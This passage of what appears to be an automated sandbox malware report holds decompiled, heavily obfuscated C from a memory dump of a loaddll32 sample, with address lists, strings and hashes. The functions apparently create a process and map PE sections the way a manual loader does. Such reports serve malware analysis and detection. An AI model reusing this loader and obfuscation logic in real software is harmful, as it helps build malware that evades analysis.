				intOrPtr _t335;
				signed int* _t338;

				_push(_a32);
				_t334 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t272 = E00D4FE29(0);
				_v84 = _t272;
				_t338 =  &(( &_v196)[0xa]);
				_v72 = _t272;
				_t335 = _t272;
				_v80 = 0x49e87b;
				_v76 = 0xc5c8e1;
				_t312 = 0x7956bd9;
				_v96 = 0x2d2511;
				_t305 = 0x6f;
				_v96 = _v96 / _t305;
				_v96 = _v96 ^ 0x00006c1e;
				_v192 = 0x2be237;
				_t22 =  &_v192; // 0x2be237
				_t306 = 0x35;
				_v192 =  *_t22 * 0x2a;
				_v192 = _v192 ^ 0x8f196f07;
				_v192 = _v192 ^ 0x2da4b7e5;
				_v192 = _v192 ^ 0xa58ec5c4;
				_v172 = 0x207d98;
				_v172 = _v172 ^ 0x972b32db;
				_v172 = _v172 | 0x9c7c4c28;
				_v172 = _v172 * 0x48;
				_v172 = _v172 ^ 0xdbcfdb8a;
				_v100 = 0x57c7e;
				_v100 = _v100 + 0xffffdd89;
				_v100 = _v100 ^ 0x000aed2d;
				_v124 = 0x64cad1;
				_v124 = _v124 + 0xffff2d5b;
				_v124 = _v124 << 4;
				_v124 = _v124 ^ 0x063cb223;
				_v148 = 0xd38c19;
				_v148 = _v148 >> 7;
				_v148 = _v148 >> 0xf;
				_v148 = _v148 ^ 0x0008e1ac;
				_v88 = 0xe6598d;
				_v88 = _v88 ^ 0xb40d33dc;
				_v88 = _v88 ^ 0xb4eaaa1c;
				_v92 = 0x85b818;
				_v92 = _v92 + 0xffffc4c3;
				_v92 = _v92 ^ 0x008e2283;
				_v104 = 0x6cafca;
				_v104 = _v104 * 0x73;
				_v104 = _v104 ^ 0x30d8f33f;
				_v120 = 0xea107;
				_v120 = _v120 / _t306;
				_v120 = _v120 ^ 0x000228b8;
				_v112 = 0x4bcc54;
				_v112 = _v112 * 0x3f;
				_v112 = _v112 ^ 0x12af13c7;
				_v176 = 0x25f352;
				_v176 = _v176 * 0x1d;
				_t307 = 0x55;
				_v176 = _v176 / _t307;
				_v176 = _v176 + 0xa166;
				_v176 = _v176 ^ 0x00018b34;
				_v168 = 0x70163a;
				_v168 = _v168 | 0xb665b778;
				_v168 = _v168 + 0xffff15cb;
				_v168 = _v168 + 0xffff931b;
				_v168 = _v168 ^ 0xb6787764;
				_v184 = 0xfb3451;
				_t308 = 0x2f;
				_v184 = _v184 * 0x55;
				_v184 = _v184 + 0xffff75a5;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 ^ 0xf953722f;
				_v160 = 0x3448db;
				_v160 = _v160 | 0x0a9a3806;
				_v160 = _v160 + 0xffffbb3e;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0xaf82d104;
				_v108 = 0x7f4bc6;
				_v108 = _v108 * 0x47;
				_v108 = _v108 ^ 0x234271fe;
				_v116 = 0x137e80;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x09bed852;
				_v140 = 0x58b738;
				_v140 = _v140 >> 3;
				_v140 = _v140 / _t308;
				_v140 = _v140 ^ 0x0006291c;
				_v152 = 0x1dae44;
				_v152 = _v152 + 0xb010;
				_t309 = 0x7a;
				_v152 = _v152 / _t309;
				_v152 = _v152 ^ 0x0004435a;
				_v136 = 0x3e9c6a;
				_v136 = _v136 + 0xffff4267;
				_v136 = _v136 + 0xa013;
				_v136 = _v136 ^ 0x00313444;
				_v128 = 0xfc4661;
				_v128 = _v128 ^ 0x84ef8931;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x021c54a7;
				_v144 = 0x2fd65c;
				_v144 = _v144 | 0x65ad1a2d;
				_v144 = _v144 ^ 0x87299bd7;
				_v144 = _v144 ^ 0xe281bdf5;
				_v180 = 0x40c6e5;
				_v180 = _v180 + 0xffff5f75;
				_v180 = _v180 + 0x6863;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x08e53add;
				_v132 = 0x50fbcf;
				_v132 = _v132 | 0xda091e24;
				_v132 = _v132 + 0xffffc3f6;
				_v132 = _v132 ^ 0xda5ae4d8;
				_v188 = 0x29fd87;
				_v188 = _v188 | 0x249d2c08;
				_v188 = _v188 << 1;
				_v188 = _v188 | 0xc4033418;
				_v188 = _v188 ^ 0xcd7b5999;
				_v196 = 0x78de76;
				_v196 = _v196 * 0x7c;
				_v196 = _v196 + 0xffff171c;
				_v196 = _v196 >> 5;
				_v196 = _v196 ^ 0x01d3afb7;
				_v156 = 0x2e37f5;
				_v156 = _v156 + 0xffff32dd;
				_v156 = _v156 >> 1;
				_v156 = _v156 * 0x73;
				_v156 = _v156 ^ 0x0a367c41;
				_v164 = 0x79bcb0;
				_v164 = _v164 + 0x8106;
				_v164 = _v164 + 0x4469;
				_v164 = _v164 + 0xffff19e3;
				_v164 = _v164 ^ 0x007fae8c;
				do {
					while(_t312 != 0x59e10b1) {
						if(_t312 == 0x7956bd9) {
							_t312 = 0x84e17ac;
							continue;
						} else {
							if(_t312 == 0x84e17ac) {
								_t264 =  &_v84; // 0x49e87b
								_t267 =  &_v172; // 0xa367c41
								_t295 = E00D44178( *_t267, _v100, _t264, _a20, _v124);
								_t338 =  &(_t338[4]);
								__eflags = _t295;
								if(_t295 != 0) {
									_t312 = 0x9148c69;
									continue;
								}
							} else {
								_t344 = _t312 - 0x9148c69;
								if(_t312 != 0x9148c69) {
									goto L10;
								} else {
									E00D4FE2A(_v148, _v88, 0x44,  &_v68);
									_push(_v112);
									_v68 = 0x44;
									_push(_v120);
									_push(_v104);
									_v60 = E00D4E1F8(0xd31224, _v92, _t344);
									_t335 = E00D3473D(_a20, _v176, _v168, 0xd31224, 0xd31224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0xd31224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
									E00D4FECB(_v60, _v180, _v132, _v188, _v196);
									_t338 =  &(_t338[0x1c]);
									_t312 = 0x59e10b1;
									continue;
								}
							}
						}
						goto L11;
					}
					_t269 =  &_v84; // 0x49e87b
					E00D47952(_v156,  *_t269, _v164);
					_t312 = 0xf5fdc0f;
					L10:
					__eflags = _t312 - 0xf5fdc0f;
				} while (_t312 != 0xf5fdc0f);
				L11:
				return _t335;
			}

0x00d40185
0x00d4018e
0x00d40190
0x00d40197
0x00d4019e
0x00d401a5
0x00d401ac
0x00d401b3
0x00d401b4
0x00d401bb
0x00d401bc
0x00d401bd
0x00d401c2
0x00d401c9
0x00d401cc
0x00d401d3
0x00d401d5
0x00d401e2
0x00d401ed
0x00d401f2
0x00d40200
0x00d40205
0x00d4020b
0x00d40213
0x00d4021b
0x00d40220
0x00d40221
0x00d40225
0x00d4022d
0x00d40235
0x00d4023d
0x00d40245
0x00d4024d
0x00d4025a
0x00d4025e
0x00d40266
0x00d4026e
0x00d40276
0x00d4027e
0x00d40286
0x00d4028e
0x00d40293
0x00d4029b
0x00d402a3
0x00d402a8
0x00d402ad
0x00d402b5
0x00d402bd
0x00d402c5
0x00d402cd
0x00d402d5
0x00d402dd
0x00d402e5
0x00d402f2
0x00d402f6
0x00d402fe
0x00d4030c
0x00d40310
0x00d40318
0x00d40325
0x00d40329
0x00d40331
0x00d4033e
0x00d4034a
0x00d4034f
0x00d40355
0x00d4035d
0x00d40365
0x00d4036d
0x00d40375
0x00d4037d
0x00d40385
0x00d4038d
0x00d4039a
0x00d4039d
0x00d403a1
0x00d403ae
0x00d403b2
0x00d403ba
0x00d403c2
0x00d403ca
0x00d403d2
0x00d403d7
0x00d403df
0x00d403ec
0x00d403f0
0x00d403f8
0x00d40400
0x00d40405
0x00d4040d
0x00d40415
0x00d40422
0x00d40426
0x00d4042e
0x00d40436
0x00d40442
0x00d40445
0x00d40449
0x00d40451
0x00d40459
0x00d40461
0x00d40469
0x00d40471
0x00d40479
0x00d40481
0x00d40486
0x00d4048e
0x00d40496
0x00d4049e
0x00d404a6
0x00d404ae
0x00d404b6
0x00d404be
0x00d404c6
0x00d404cb
0x00d404d3
0x00d404db
0x00d404e3
0x00d404eb
0x00d404f3
0x00d404fb
0x00d40503
0x00d40507
0x00d4050f
0x00d40517
0x00d40524
0x00d40528
0x00d40530
0x00d40535
0x00d4053d
0x00d4054a
0x00d40557
0x00d40560
0x00d40564
0x00d4056c
0x00d40574
0x00d4057c
0x00d40584
0x00d4058c
0x00d40594
0x00d40594
0x00d405a6
0x00d406c4
0x00000000
0x00d405ac
0x00d405ae
0x00d4069a
0x00d406ad
0x00d406b1
0x00d406b6
0x00d406b9
0x00d406bb
0x00d406bd
0x00000000
0x00d406bd
0x00d405b4
0x00d405b4
0x00d405b6
0x00000000
0x00d405bc
0x00d405ce
0x00d405d3
0x00d405dc
0x00d405e7
0x00d405eb
0x00d405fe
0x00d4066c
0x00d40684
0x00d40689
0x00d4068c
0x00000000
0x00d4068c
0x00d405b6
0x00d405ae
0x00000000
0x00d405a6
0x00d406cf
0x00d406da
0x00d406e0
0x00d406e5
0x00d406e5
0x00d406e5
0x00d406f2
0x00d406fd

Strings

ch, xrefs: 00D404BE
-, xrefs: 00D40276
{I, xrefs: 00D4069A, 00D406A8
D41, xrefs: 00D40469
A|6, xrefs: 00D406AD
D, xrefs: 00D405DC
7+, xrefs: 00D4021B
iD, xrefs: 00D4057C

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: -$7+$A|6$D$D41$ch$iD${I
API String ID: 0-1622838380
Opcode ID: 7d959173e9347e1489cffa29675bd6c5ac9a63307b87e7aaa1fe1d64740777c8
Instruction ID: f68ee437dd46fc04e97138adf00d951756bb0d038a5a3a7813efa65f0207835f
Opcode Fuzzy Hash: 7d959173e9347e1489cffa29675bd6c5ac9a63307b87e7aaa1fe1d64740777c8
Instruction Fuzzy Hash: 6AD1FEB25083819FD3A8CF61C889A1BFBE1FBD5358F508A1DF69596260D3B58948CF13

Uniqueness

Uniqueness Score: -1.00%

Function 00D427F9, Relevance: 10.2, Strings: 8, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00D427F9() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				short* _t249;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t260;
				intOrPtr _t267;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int* _t294;

				_t294 =  &_v1144;
				_v1076 = 0xe2454d;
				_v1076 = _v1076 << 0xe;
				_t260 = 0xa27996a;
				_v1076 = _v1076 ^ 0x9150c829;
				_v1116 = 0xb7d7ba;
				_v1116 = _v1116 >> 3;
				_v1116 = _v1116 * 0x45;
				_v1116 = _v1116 ^ 0x0637cdcd;
				_v1064 = 0x633f3;
				_t288 = 7;
				_v1064 = _v1064 / _t288;
				_v1064 = _v1064 ^ 0x000e68da;
				_v1044 = 0x68e137;
				_v1044 = _v1044 >> 8;
				_v1044 = _v1044 ^ 0x000f94d8;
				_v1104 = 0x560a82;
				_t289 = 0x4d;
				_v1104 = _v1104 * 0x12;
				_v1104 = _v1104 << 0xa;
				_v1104 = _v1104 ^ 0x32f73e43;
				_v1128 = 0x20b49c;
				_v1128 = _v1128 + 0xffff9350;
				_v1128 = _v1128 / _t289;
				_v1128 = _v1128 + 0xffff69f1;
				_v1128 = _v1128 ^ 0xfff8ef71;
				_v1144 = 0xda057e;
				_v1144 = _v1144 | 0x61d5fb11;
				_v1144 = _v1144 + 0x9b0d;
				_t290 = 0x47;
				_v1144 = _v1144 / _t290;
				_v1144 = _v1144 ^ 0x016fc7d6;
				_v1108 = 0xd954d9;
				_v1108 = _v1108 >> 3;
				_v1108 = _v1108 * 0x2a;
				_v1108 = _v1108 ^ 0x047d2f3f;
				_v1084 = 0xee9532;
				_v1084 = _v1084 | 0x01e1ea12;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0xb61982a0;
				_v1136 = 0x9da312;
				_v1136 = _v1136 * 0xb;
				_v1136 = _v1136 + 0xfaec;
				_v1136 = _v1136 << 4;
				_v1136 = _v1136 ^ 0x6c675c41;
				_v1048 = 0x5b4722;
				_v1048 = _v1048 + 0x58c6;
				_v1048 = _v1048 ^ 0x0051fe1e;
				_v1140 = 0xb81c47;
				_v1140 = _v1140 | 0xf47f3da9;
				_v1140 = _v1140 + 0xffffb1b6;
				_v1140 = _v1140 * 0x52;
				_v1140 = _v1140 ^ 0x79a8ba01;
				_v1100 = 0x4ec91e;
				_v1100 = _v1100 + 0xffff658a;
				_v1100 = _v1100 + 0xa7da;
				_v1100 = _v1100 ^ 0x004d9e7a;
				_v1056 = 0xd22e34;
				_v1056 = _v1056 * 0x39;
				_v1056 = _v1056 ^ 0x2eccf222;
				_v1092 = 0x4415ff;
				_v1092 = _v1092 << 0xc;
				_v1092 = _v1092 + 0xffffcb4f;
				_v1092 = _v1092 ^ 0x4156ca29;
				_v1112 = 0xebdea7;
				_v1112 = _v1112 + 0xffff30b5;
				_v1112 = _v1112 ^ 0x44658fef;
				_v1112 = _v1112 ^ 0x4481ff75;
				_v1132 = 0x210e2f;
				_v1132 = _v1132 + 0x4766;
				_v1132 = _v1132 >> 6;
				_t291 = 0x78;
				_v1132 = _v1132 / _t291;
				_v1132 = _v1132 ^ 0x000739d3;
				_v1072 = 0xec15b6;
				_v1072 = _v1072 + 0xf74;
				_v1072 = _v1072 ^ 0x00e11cf3;
				_v1096 = 0xda8ada;
				_v1096 = _v1096 >> 0xe;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x00036eb4;
				_v1120 = 0x69db3;
				_v1120 = _v1120 + 0x311c;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x00187b2b;
				_v1068 = 0x7459e2;
				_v1068 = _v1068 >> 8;
				_v1068 = _v1068 ^ 0x000d8df4;
				_v1060 = 0x7a5957;
				_v1060 = _v1060 + 0x9cd0;
				_v1060 = _v1060 ^ 0x007b6b01;
				_v1088 = 0xc3c012;
				_v1088 = _v1088 >> 0x10;
				_v1088 = _v1088 << 5;
				_v1088 = _v1088 ^ 0x00089583;
				_v1124 = 0x7ac281;
				_v1124 = _v1124 >> 0xa;
				_v1124 = _v1124 >> 0xf;
				_v1124 = _v1124 + 0xc97f;
				_v1124 = _v1124 ^ 0x00055573;
				_v1052 = 0x890174;
				_v1052 = _v1052 + 0xa006;
				_v1052 = _v1052 ^ 0x008bc550;
				_v1080 = 0xeb1cb6;
				_v1080 = _v1080 ^ 0x4b3beb78;
				_v1080 = _v1080 >> 0x10;
				_v1080 = _v1080 ^ 0x00025049;
				while(_t260 != 0x3b56309) {
					if(_t260 == 0x7219719) {
						E00D4DC71();
						L8:
						_t260 = 0x9bc0f5a;
						continue;
					}
					if(_t260 == 0x9631a61) {
						_t249 = E00D409DD(_v1060,  &_v1040, _v1088, _v1124);
						__eflags = 0;
						 *_t249 = 0;
						return E00D3856E( &_v1040, _v1052, _v1080);
					}
					if(_t260 == 0x9bc0f5a) {
						_push(_v1128);
						_push(_v1104);
						_push(_v1044);
						_t251 = E00D4E1F8(0xd31000, _v1064, __eflags);
						_t267 =  *0xd56214; // 0x0
						_t253 =  *0xd56214; // 0x0
						E00D52D0A(_v1108, __eflags, _t253 + 0x23c, _v1084, _v1136, _v1048, _t267 + 0x34,  &_v1040, _t267 + 0x34, _t251);
						E00D4FECB(_t251, _v1140, _v1100, _v1056, _v1092);
						_t294 =  &(_t294[0xe]);
						_t260 = 0x3b56309;
						continue;
					}
					if(_t260 == 0xa27996a) {
						_t257 =  *0xd56214; // 0x0
						__eflags =  *((intOrPtr*)(_t257 + 0x20));
						_t260 =  !=  ? 0xb537953 : 0x7219719;
						continue;
					}
					if(_t260 != 0xb537953) {
						L13:
						__eflags = _t260 - 0xf6a818b;
						if(__eflags != 0) {
							continue;
						}
						return _t257;
					}
					_t257 = E00D3A445();
					goto L8;
				}
				E00D31CA1(_v1112, _v1132, _v1072,  &_v520);
				E00D4654A(_v1096, _v1120, __eflags,  &_v1040, _v1068,  &_v520);
				_t294 =  &(_t294[5]);
				_t260 = 0x9631a61;
				goto L13;
			}

0x00d427f9
0x00d427ff
0x00d42809
0x00d4280e
0x00d42813
0x00d4281b
0x00d42823
0x00d42831
0x00d42835
0x00d4283d
0x00d4284b
0x00d42850
0x00d42856
0x00d4285e
0x00d42866
0x00d4286b
0x00d42873
0x00d42880
0x00d42883
0x00d42887
0x00d4288c
0x00d42894
0x00d4289c
0x00d428ac
0x00d428b0
0x00d428b8
0x00d428c0
0x00d428c8
0x00d428d0
0x00d428dc
0x00d428df
0x00d428e3
0x00d428eb
0x00d428f3
0x00d428fd
0x00d42901
0x00d42909
0x00d42911
0x00d4291e
0x00d42922
0x00d4292a
0x00d42937
0x00d4293b
0x00d42943
0x00d42948
0x00d42950
0x00d42958
0x00d42960
0x00d42968
0x00d42970
0x00d42978
0x00d42985
0x00d42989
0x00d42991
0x00d42999
0x00d429a1
0x00d429a9
0x00d429b1
0x00d429be
0x00d429c2
0x00d429cc
0x00d429d9
0x00d429e3
0x00d429f0
0x00d429f8
0x00d42a00
0x00d42a08
0x00d42a10
0x00d42a18
0x00d42a20
0x00d42a28
0x00d42a33
0x00d42a36
0x00d42a3a
0x00d42a42
0x00d42a4a
0x00d42a52
0x00d42a5a
0x00d42a62
0x00d42a6c
0x00d42a70
0x00d42a78
0x00d42a80
0x00d42a88
0x00d42a8d
0x00d42a95
0x00d42a9d
0x00d42aa2
0x00d42aaa
0x00d42ab2
0x00d42aba
0x00d42ac2
0x00d42aca
0x00d42acf
0x00d42ad4
0x00d42adc
0x00d42ae4
0x00d42ae9
0x00d42aee
0x00d42af6
0x00d42afe
0x00d42b06
0x00d42b0e
0x00d42b16
0x00d42b1e
0x00d42b26
0x00d42b2b
0x00d42b33
0x00d42b41
0x00d42c06
0x00d42b70
0x00d42b70
0x00000000
0x00d42b70
0x00d42b4d
0x00d42c70
0x00d42c7d
0x00d42c7f
0x00000000
0x00d42c8e
0x00d42b55
0x00d42b84
0x00d42b8d
0x00d42b91
0x00d42b99
0x00d42b9e
0x00d42bc3
0x00d42bd6
0x00d42bf0
0x00d42bf5
0x00d42bf8
0x00000000
0x00d42bf8
0x00d42b5d
0x00d42b74
0x00d42b7b
0x00d42b7f
0x00000000
0x00d42b7f
0x00d42b61
0x00d42c52
0x00d42c52
0x00d42c58
0x00000000
0x00000000
0x00000000
0x00d42c58
0x00d42b6b
0x00000000
0x00d42b6b
0x00d42c24
0x00d42c45
0x00d42c4a
0x00d42c4d
0x00000000

Strings

WYz, xrefs: 00D42AAA
7h, xrefs: 00D4285E
A\gl, xrefs: 00D42948
fG, xrefs: 00D42A20
Yt, xrefs: 00D42A95
ME, xrefs: 00D427FF
x;K, xrefs: 00D42B1E
"G[, xrefs: 00D42950

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "G[$7h$A\gl$ME$WYz$fG$x;K$Yt
API String ID: 0-2581693823
Opcode ID: d5c423a0358af61b3cf61eba85f547ceedc2e2e6be1ae531ce2208a70f66efb3
Instruction ID: 528445111fac8ceb7e547706bf3913013b7535addd37374bde5134a02edc7d5d
Opcode Fuzzy Hash: d5c423a0358af61b3cf61eba85f547ceedc2e2e6be1ae531ce2208a70f66efb3
Instruction Fuzzy Hash: FBC10BB14093419FC368CF25C58A51BBBF1FBC4758F508A2DF29696260D7B18A09CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00D53263, Relevance: 10.2, Strings: 8, Instructions: 175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00D53263(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t171;
				void* _t188;
				void* _t198;
				void* _t200;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				void* _t233;
				void* _t238;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;

				_push(_a16);
				_t240 = _a4;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00D4FE29(_t171);
				_v52 = 0x577e5f;
				_v52 = _v52 >> 2;
				_v52 = _v52 >> 2;
				_t202 = 0x5a;
				_v52 = _v52 / _t202;
				_v52 = _v52 ^ 0x00001f8d;
				_v56 = 0xc1a783;
				_v56 = _v56 | 0xd091f394;
				_t203 = 0x7d;
				_v56 = _v56 / _t203;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x00004aea;
				_v36 = 0x5ab329;
				_v36 = _v36 | 0xfb978afd;
				_v36 = _v36 << 0xc;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x77fa0040;
				_v60 = 0xfb6851;
				_t204 = 0x5f;
				_v60 = _v60 / _t204;
				_v60 = _v60 + 0xffff827f;
				_v60 = _v60 + 0xffffffdf;
				_v60 = _v60 ^ 0x000cafd7;
				_v24 = 0xe59b9d;
				_v24 = _v24 + 0x8cf1;
				_v24 = _v24 << 0xd;
				_v24 = _v24 ^ 0xc51da5fe;
				_v40 = 0x4a3359;
				_v40 = _v40 + 0xb1f1;
				_v40 = _v40 ^ 0xc176e2ad;
				_v40 = _v40 << 0xb;
				_v40 = _v40 ^ 0xe0393f27;
				_v44 = 0x442ad8;
				_v44 = _v44 + 0xffffa8db;
				_v44 = _v44 ^ 0xa2d0149a;
				_v44 = _v44 | 0x2bbd0b31;
				_v44 = _v44 ^ 0xabb0f764;
				_v20 = 0x80424;
				_v20 = _v20 + 0xffff6539;
				_v20 = _v20 + 0xd5f9;
				_v20 = _v20 ^ 0x000cf2ae;
				_v48 = 0x677157;
				_v48 = _v48 + 0xec21;
				_v48 = _v48 ^ 0x036b165d;
				_t205 = 0x14;
				_v48 = _v48 / _t205;
				_v48 = _v48 ^ 0x002fc559;
				_v16 = 0xa7ae7b;
				_v16 = _v16 | 0x7198ce36;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0xe373c07b;
				_v32 = 0xbd3d32;
				_v32 = _v32 | 0x84fa4a87;
				_v32 = _v32 * 0xf;
				_t206 = 0x34;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0xd7bdec0b;
				_v8 = 0x4158ae;
				_v8 = _v8 / _t206;
				_v8 = _v8 ^ 0x000847ec;
				_v28 = 0x8e7645;
				_v28 = _v28 + 0xffff0216;
				_v28 = _v28 + 0x7276;
				_t207 = 0x60;
				_v28 = _v28 * 0x4a;
				_v28 = _v28 ^ 0x290f0829;
				_v4 = 0x80a154;
				_v4 = _v4 ^ 0x762c831e;
				_v4 = _v4 ^ 0x76a70d93;
				_v12 = 0x206e81;
				_v12 = _v12 / _t207;
				_v12 = _v12 + 0xffffa107;
				_v12 = _v12 ^ 0xffff9c06;
				_t208 = _v60;
				_t188 = E00D5287F(_v60, _a4, _v24);
				_t198 = _t188;
				_t242 =  &(( &_v60)[7]);
				if(_t198 != 0) {
					_t233 = E00D462C7( *((intOrPtr*)(_t198 + 0x50)), _v36, _v40, _t208, _v44, _v20, _v48, _v56 | _v52);
					_t243 =  &(_t242[6]);
					if(_t233 == 0) {
						L6:
						return _t233;
					}
					E00D4C9B0(_v16, _t233, _v32,  *((intOrPtr*)(_t198 + 0x54)),  *_t240, _v8);
					_t244 =  &(_t243[4]);
					_t238 = ( *(_t198 + 0x14) & 0x0000ffff) + 0x18 + _t198;
					_t200 = ( *(_t198 + 6) & 0x0000ffff) * 0x28 + _t238;
					while(_t238 < _t200) {
						_t196 =  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10));
						E00D4C9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
						_t244 =  &(_t244[4]);
						_t238 = _t238 + 0x28;
					}
					goto L6;
				}
				return _t188;
			}

0x00d53268
0x00d5326c
0x00d53270
0x00d53272
0x00d53276
0x00d53277
0x00d53278
0x00d53279
0x00d5327e
0x00d53288
0x00d5328d
0x00d53298
0x00d5329d
0x00d532a3
0x00d532ab
0x00d532b3
0x00d532bf
0x00d532c4
0x00d532ca
0x00d532cf
0x00d532d7
0x00d532df
0x00d532e7
0x00d532ec
0x00d532f1
0x00d532f9
0x00d53305
0x00d5330a
0x00d53310
0x00d53318
0x00d5331d
0x00d53325
0x00d5332d
0x00d53335
0x00d5333a
0x00d53342
0x00d5334a
0x00d53352
0x00d5335a
0x00d5335f
0x00d53367
0x00d5336f
0x00d53377
0x00d5337f
0x00d53387
0x00d5338f
0x00d53397
0x00d5339f
0x00d533a7
0x00d533af
0x00d533b7
0x00d533bf
0x00d533cb
0x00d533ce
0x00d533d2
0x00d533da
0x00d533e2
0x00d533ea
0x00d533ee
0x00d533f6
0x00d533fe
0x00d5340b
0x00d53418
0x00d5341b
0x00d5341f
0x00d53427
0x00d53437
0x00d5343b
0x00d53443
0x00d5344b
0x00d53453
0x00d53460
0x00d53461
0x00d53465
0x00d5346d
0x00d53475
0x00d5347d
0x00d53485
0x00d53495
0x00d53499
0x00d534a1
0x00d534ad
0x00d534b1
0x00d534b6
0x00d534b8
0x00d534bd
0x00d534ea
0x00d534ec
0x00d534f1
0x00d53557
0x00000000
0x00d53559
0x00d53508
0x00d53511
0x00d5351b
0x00d53520
0x00d53552
0x00d5353a
0x00d53547
0x00d5354c
0x00d5354f
0x00d5354f
0x00000000
0x00d53556
0x00d5355f

Strings

!, xrefs: 00D533B7
@, xrefs: 00D532F1
$P, xrefs: 00D534CB
'?9, xrefs: 00D5335F
vr, xrefs: 00D53453
_~W, xrefs: 00D5327E
J, xrefs: 00D532CF
Wqg, xrefs: 00D533AF

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !$$P$'?9$@$Wqg$_~W$vr$J
API String ID: 0-3966742547
Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction ID: 9521c61068cf00a0906b814f2284afd67343138719fa4805b3622d0fe8a46c66
Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction Fuzzy Hash: 67813072508340AFC358CF66C88A81BBBF2FBC5758F149A1DF99986260D3B6D945CF06

Uniqueness

Uniqueness Score: -1.00%

Function 00D517BD, Relevance: 9.1, Strings: 7, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00D517BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				void* _t369;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t402;
				void* _t412;
				intOrPtr _t415;
				intOrPtr _t419;
				void* _t425;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int* _t475;

				_push(_a8);
